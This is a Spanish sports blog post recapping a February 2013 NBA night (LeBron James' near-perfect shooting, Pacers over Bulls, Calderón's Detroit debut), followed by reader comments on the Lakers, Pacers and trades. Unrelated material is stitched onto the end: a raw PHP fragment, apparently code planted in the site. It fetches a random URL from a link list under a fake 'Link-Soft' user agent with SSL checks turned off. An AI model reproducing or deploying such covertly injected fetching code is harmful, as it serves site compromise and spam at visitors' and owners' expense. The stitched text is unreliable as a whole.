Crónica: LeBron James responde al guiño

05 de February de 2013 por Simon

LeBron James venía quejándose durante toda la semana pasada por no poder ver la Superbowl debido a que su equipo estaría a esas horas volando desde Canadá a Miami para disputar el partido ante Charlotte. A última hora, los Heat decidieron contentar a su jugador franquicia atrasando el plan de vuelo para que pudieran ver el partido en el mismo Toronto  a pesar de que esto podría comprometer el descanso necesario para el partido de ayer ante Bobcats. Nada más lejos de la realidad, Miami lució perfecto ante Charlotte (94-99). El partido transcurrió igualado con constantes alternativas pero al final la experiencia de Miami se impuso a unos voluntariosos Bobcats. LeBron James estuvo casi perfecto en el partido de ayer, sólo Biyombo le hizo fallar un lanzamiento de los 14 que realizó ayer a canasta para lograr 31 puntos adornados con 8 rebotes y otras tantas asistencias. Wade y Bosh también aportaron a buen ritmo en una nueva victoria Heat, que por cierto ayer lucían una equipación preciosa.

El partido de la noche probablemente se disputaba en Indiana. Era el que no se pudo disputar el día 26 de diciembre debido a la intensa nevada que cayó sobre el centro del país. A pesar de las bajas, Chicago visitaba a los Pacers para luchar por el partido y por la primera plaza de la división Central, liderato que ahora es compartido por ambos equipos tras la victoria Pacers (101-111). Tras un primer cuarto igualada, Indiana cogió las riendas del partido y obtuvo las primeras ventajas significativas llegando a alcanzar 14 puntos de renta nada más empezar el último cuarto, pero Chicago, de la mano de un Belinelli muy entonado, consiguió a base de casta meterse en el encuentro y a falta de poco mas de 3 minutos se encontraban a sólo 4 puntos. Fue ahí cuando apareció Paul George con una canasta y un triple a falta de 1 minuto que ahogó las esperanzas de remontada de Chicago. Los Pacers terminaron de darle forma a la victoria con 10 tiros libres en el último minuto. Deng y Boozer tuvieron una noche para olvidar 8/30 entre ambos, destacando el 4/18 de Luol Deng.  En los Pacers todos los titulares menos Hibbert acabaron en dobles dígitos de anotación. Chicago rompió anoche su racha de partidos ganando si anotaban más de 100 puntos. 

Calderón debutó con los Pistons siendo el máximo anotador en la derrota de Detroit en el MSG a manos de los Knicks capitaneados por un Carmelo Anthony que se rehízo del mal partido anterior con 27 puntos  y 7 asistencias. El partido no tuvo demasiada historia pues en el primer cuarto New York puso tierra de por medio para atar la victoria que los mantiene en dura pugna por el liderato del Este con Miami. (85-99).

Washington hizo valer su localía ante Los Angeles Clippers que anoche tampoco pudieron contar con Blake Griffin que se retiró del calentamiento minutos antes del partido. No era el mejor día para estar sin tus dos estrellas, pues Wizards tras la vuelta de Wall es un equipo peligroso. El juego errático de los de Los Angeles, sobretodo en el último cuarto, permitió a los Wizards correr durante todo el partido y sentenciar al final al contraataque. Los de la capital contaron con 5 jugadores en dobles dígitos de anotación destacando los 21 puntos de Webster. Por los Clippers apenas Crawford y Bledsoe plantaron cara acompañados por la lucha de Jordan en los tableros (90-98). Si Paul tarda mucho en volver, los Clippers se van a ver envueltos en la batalla por el 4º puesto de la conferencia y demasiado descolgados del liderato.

Los deprimidos Wolves recibían a los Blazers y hasta el tercer cuarto la verdad es que se estaban llevando una auténtica paliza. En el último cuarto, sin embargo, un Ricky Rubio imperial unido a la relajación Blazers hizo que a punto estuviera Minnesota de dar la vuelta al partido. Hasta 9 asistencias logró Rubio en este cuarto para terminar el partido con 15 puntos y 14 asistencias, aunque falló la última jugada para empatar el encuentro. En Portland Aldridge y el próximo ROY Lillard fueron los mejores (100-98).

En el resto de partidos, Dallas no fue rival para Oklahoma City Thunder (91-112) lo que hizo que los menos habituales del equipo de Scott Brooks pudieran disponer de minutos extra.  En Dallas nadie, excepto Marion, dio el nivel mínimo exigible al igual que tampoco lo dio nadie de Orlando ante Philadelphia (61-78). Hawes y Holiday capitanearon una victoria sencilla pero con poco lustre. En el último partido de la noche tuvimos una prórroga. Utah necesitó un tiempo extra para vencer a Sacramento a pesar de la expulsión en el descanso de Cousins tras discutir con los árbitros. 6 jugadores de Utah lograron 10 o más puntos (91-98).

PREMIOS

MVP: Tremendo LeBron James, un día más. A su habitual aportación en puntos, rebotes y asistencias ayer unió un acierto espectacular en los tiros de campo. 13 de 14, para 31 puntos. Los 8 rebotes y 8 asistencias adornan el pastel. LaMarcus Aldridge continua imperial y es la principal razón de la sorprendente buena marcha de los Blazers. 25 puntos, 13 rebotes, 5 asistencias y 2 jugadas claves en el último minuto para dar la victoria a su equipo.

Rookie: Ya no hay empoción. Damian Lillard será el rookie del año y actuaciones como las de ayer (21-4-6 y 3 robos) no hacen sino refrendarlo.

Sorpresa: Spencer Hawes se merendó a Nikola Vucevic que tan regular venía mostrándose. El de los Sixers anotó 21 puntos y cogió 14 rebotes. Martell Webster fue el máximo anotador de los Wizards ante los Clippers.

Decepción: Los Magic se quedaron en 61 puntos míseros puntos pero si hay que escoger a un jugador habrá que quedarse con el 4 de 18 de Luol Deng.

Esfuerzo en vano: El jugador de la semana en la conferencia Este suma y sigue. De nuevo, Nate Robinson fue el mejor de su equipo con 19 puntos, 5 rebotes y 9 asistencias. Los 28 puntos de Jamal Crawford tampoco sirvieron para que su equipo se llevara la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Jornada sin muchos grandes partidos.
    Lo más interesante estaba en Indiana donde los Pacers siguen escalando y ya son terceros del Este. Veremos que pasa cuando vuelva Granger pero no deberían tocar el rol de Paul George que está siendo su principal figura. Su traspaso por un dos en condiciones les podría hacer aspirantes al Este. Los Bulls demasiado hacen con las lesiones que tienen mientras todos esperan la vuelta de Rose. Si éste está recuperado y en forma para PO y no tienen otras lesiones cuidado con ellos.
    En el Este entre Heat (1º) y Bucks (7º) hay 6.5 partidos así que espera un final de regular de lo más apretado para decidir las ventajas de campo.
    Del resto ganaron los favoritos excepto los Clippers que siguen su caída sin CP3 en la dirección y que ya están metidos de lleno en la lucha por los puestos 3-6 del Oeste con rivales de cuidado como Memphis, Golden State y Denver. Parecían candidatos a todo pero sin Paul está claro que no lo son. Veremos si su recuperación les manda otra vez para arriba o no pero han perdido comba (¿definitiva?) con los líderes OKC y Spurs y parece que se tendrán que centrar en intentar ser terceros lo que no será fácil tampoco.
    Mientras en la lucha por PO Portland y Utah ganaron complicando más las cosas para los Lakers que siguen todavía lejos de la 8ª plaza (y de la 9ª).

      Citar

  2. HisRoyalAirness dice:
    #2

    Mis cuentas son que el animal de Ricky dio 10 asistencias en el último cuarto. Casi se merienda él solo a Portland

      Citar

  3. Ruxixón dice:
    #3

    Contemplé el debut de Calderón en el Madison con su nueva camiseta y Detroit,fuera y sin acoplar,son malos,malos.Aún así me parece interesante que de primeras cuenten con Calde,pasando a Knight al SG y Stuckey de suplente de ambos con Bynum pululando por ahí.Mientras sigan ciertos pufos como Maxiell o Villanueva por allí poco por hacer.Tampoco fue el mejor día para ver a Drummond que tan solo jugó 8 minutitos,pero en el debe se le apunta esa tendencia horrible con las manos abajo buscando el robo,de ahí muchas veces los problemas de faltas que tiene.Cadera lenta,está verde pero es el futuro de ese equipo,aún sin que me parezcan ninguno de los dos (Drummond & Monroe) jugadores sobre los que pueda girar un equipo.

      Citar

  4. Ruxixón dice:
    #4

    Se rumorea que Gasol de seguir Howard y D’Antoni pedirá el traspaso este verano pero de momento nada,y Kuchpak que no habrá más movimiento en Lakerland.Quiero más traspasos coño xDDD

      Citar

  5. MagicJohnson32 dice:
    #5

    También se rumorea que Howard no renovaría si D’Antoni sigue. Así que está claro quién tiene más papeletas para irse al paro ¿no?

    Por cierto, Artest ha sido sancionado por el enganchón con Brandon Knight y no jugará hoy en Brooklyn. Howard parece que también será baja.

      Citar

  6. Jose Luis dice:
    #6

    Espero ver a Ebanks como titular entonces. Joder a ver si lo mete en la rotación, que Ebanks no es un manta. Muchos aleros hay por ahí jugando peores que él, además es largo y rápido, vendría bien a los Lakers.

      Citar

  7. MagicJohnson32 dice:
    #7

    Jose Luis:
    Espero ver a Ebanks como titular entonces. Joder a ver si lo mete en la rotación, que Ebanks no es un manta. Muchos aleros hay por ahí jugando peores que él, además es largo y rápido, vendría bien a los Lakers.

    Creo que D’Antoni saldrá con Meeks o Morris de 2 y Kobe de 3, o con Clark de 3 y Jamison de 4, aunque puede que tengas razón y meta a Ebanks de inicio.

      Citar

  8. nba dice:
    #8

    Yo con tal de que juegue algo Sacre para dar descanso a Pau me conformo.

      Citar

  9. Esteban dice:
    #9

    los lakers sin duda no pegan una, no es su año y ya, les pasa de todo, otro año quiza tengan su chance

    que tal frank vogel como mejor entrenador de la nba?

    perdio a collison por un inestable mahini, los refueroz geral green y dj austin han naufragado y perdieron al maximo anotador de las ultimas 5 campañas en indiana, quiza el unico anotador puro de toda la plantilla granger, y para colmo a hibbert le dio el ataque ERIC DAMPIER

    y como se las ha rebuscado? tercero en el este, un pichoncito suyo all-star, Y LA MEJOR DEFENSIVA DE LA LIGA,
    los pacers defendiarn bien, pero cambiar a collison por hill y a granger por stephenson, los ha hecho geniales

    vogel, entro como interino luego de o´brien y metio a us equipo los dos años seguidos en PO, y va por el tercero, y no ha sido barrido nunca en postemporada

    si granger acepta salir del banco como sexyo hombre, para no mover el 5 inicial de los pacers, podria ser darle el salto de calidad que les esta faltando para en caso de una semifinal de conferencia, sea contra el que sea, las apuestas estes 50 y 50

      Citar

  10. Simon dice:
    #10

    Para mi ahora mismo el COY estaría entre Vogel y Tibodeau… y como el de Chicago ya tiene uno pues se lo daría a Vogel…

      Citar

  11. Jose Luis dice:
    #11

    ¿POR QUÉ NO JUEGA DEVIN EBANKS? ¿POR QUÉ?

      Citar

  12. Jose Luis dice:
    #12

    Blake, Duhon, Meeks, Clark, Sacre en pista. Pero no hay hueco para Ebanks…

      Citar

  13. Jose Luis dice:
    #13

    Nash ha encontrado en Clark su Amare Stoudemire particular. Puede armar un tiro rápido y con elevación desde los 6 metros y ser preciso, cosa que no pueden hacer Gasol ni Howard.

    Y vaya mate de Kobe… OMG!

      Citar

  14. Jose Luis dice:
    #14

    Wow, victoria Lakers. Sin Howard ni World Peace. Sin Paupor lesión de tobillo (veremos en qué queda) los tres últimos minutos del último cuarto. Gran partido. ¿Mal los Nets, o siempre juegan así? A mí es que no me dan ninguna seguridad, y sigo pensando que se pueden ir fuera de PO en primera ronda.

      Citar

  15. Jose Luis dice:
    #15

    Bueno, puedo asegurar, que salvo lesiones, los Nets se irán fuera en primera ronda. No les veo capaces de ganar a Heat, ni Knicks, ni Bulls ni Pacers. Incluso con la lesión de algun secundario en estos equipos (Allen, Felton, Gibson, Hansbrough) no podrían eliminarles.

      Citar

  16. MagicJohnson32 dice:
    #16

    Jose Luis:
    Y vaya mate de Kobe… OMG!

    Madre mía ¡¡directamente llegado de 1998!!

    https://www.youtube.com/watch?v=Pysbk2lgKS8

    Partido muy serio de los Lakers, de un mérito enorme dadas las circunstancias, que no paso a detallar porque me voy a dormir xD

      Citar

  17. Jose Luis dice:
    #17

    Lo de Gasol parece grave… Desgarro de la fascia plantar puede ser…

      Citar

  18. Chipi dice:
    #18

    Dalembert come niños.

      Citar

  19. Simon dice:
    #19

    madremia Dalembert! cuando me he levantado y he visto el blog no me lo podia creer…

      Citar

  20. nba dice:
    #20

    Jose Luis: Lo de Gasol parece grave… Desgarro de la fascia plantar puede ser…

    Se veia venir…, esperemos que no sea como la lesion que tuvo en el mundial 2006

      Citar

  21. Jose Luis dice:
    #21

    Go to work Kobe!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>